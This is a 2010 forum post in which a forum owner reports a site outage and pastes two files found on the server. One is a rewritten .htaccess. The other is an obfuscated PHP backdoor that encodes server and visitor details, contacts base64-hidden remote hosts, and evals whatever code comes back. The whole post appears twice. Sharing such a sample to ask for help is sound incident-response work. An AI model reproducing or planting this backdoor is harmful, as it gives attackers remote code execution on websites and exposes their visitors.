2010-02-24, 03:04 PM
Woke up this morning to see my forum was down so after browsing through the files on the server I noticed the .htaccess file was changed yesterday, and there was an additional .htaccess file in the uploads directory.
There was an odd .php file in the uploads directory - could this have been added by anything else than someone having access to the server? I've pasted what the files looked like below. With these files the index of the forum was not accessible but after removing them everything seems normal. BTW, I'm running 1.4.9. I'll upgrade to 1.4.11 tonight but I wanted to share this as it is very strange. I changed all my admin/server passwords after deleting the files.
Was this a hack or something else?
.htaccess file content -----------------------
Options -MultiViews
ErrorDocument 404 /forum/showthread.php
Options -MultiViews
ErrorDocument 404 /forum/attachment.php
Options -MultiViews
ErrorDocument 404 /forum/sendthread.php
Options -MultiViews
ErrorDocument 404 /forum/syndication.php
Options -MultiViews
ErrorDocument 404 /forum/printthread.php
Options -MultiViews
ErrorDocument 404 /forum/usercp2.php
Options -MultiViews
ErrorDocument 404 /forum/newreply.php
Options -MultiViews
ErrorDocument 404 /forum/showteam.php
Options -MultiViews
ErrorDocument 404 /forum/private.php
Options -MultiViews
ErrorDocument 404 /forum/search.php
Options -MultiViews
ErrorDocument 404 /forum/reputation.php
Options -MultiViews
ErrorDocument 404 /forum/misc.php
Options -MultiViews
ErrorDocument 404 /forum/calendar.php
Options -MultiViews
ErrorDocument 404 /forum/index.php
Options -MultiViews
ErrorDocument 404 /forum/member.php
Options -MultiViews
ErrorDocument 404 /forum/ratethread.php
Options -MultiViews
ErrorDocument 404 /forum/forumdisplay.php
PHP file content -----------------------------
<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="e6ef6a96228e594817f7e10d3bb49aef") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>
There was an odd .php file in the uploads directory - could this have been added by anything else than someone having access to the server? I've pasted what the files looked like below. With these files the index of the forum was not accessible but after removing them everything seems normal. BTW, I'm running 1.4.9. I'll upgrade to 1.4.11 tonight but I wanted to share this as it is very strange. I changed all my admin/server passwords after deleting the files.
Was this a hack or something else?
.htaccess file content -----------------------
Options -MultiViews
ErrorDocument 404 /forum/showthread.php
Options -MultiViews
ErrorDocument 404 /forum/attachment.php
Options -MultiViews
ErrorDocument 404 /forum/sendthread.php
Options -MultiViews
ErrorDocument 404 /forum/syndication.php
Options -MultiViews
ErrorDocument 404 /forum/printthread.php
Options -MultiViews
ErrorDocument 404 /forum/usercp2.php
Options -MultiViews
ErrorDocument 404 /forum/newreply.php
Options -MultiViews
ErrorDocument 404 /forum/showteam.php
Options -MultiViews
ErrorDocument 404 /forum/private.php
Options -MultiViews
ErrorDocument 404 /forum/search.php
Options -MultiViews
ErrorDocument 404 /forum/reputation.php
Options -MultiViews
ErrorDocument 404 /forum/misc.php
Options -MultiViews
ErrorDocument 404 /forum/calendar.php
Options -MultiViews
ErrorDocument 404 /forum/index.php
Options -MultiViews
ErrorDocument 404 /forum/member.php
Options -MultiViews
ErrorDocument 404 /forum/ratethread.php
Options -MultiViews
ErrorDocument 404 /forum/forumdisplay.php
PHP file content -----------------------------
<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="e6ef6a96228e594817f7e10d3bb49aef") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>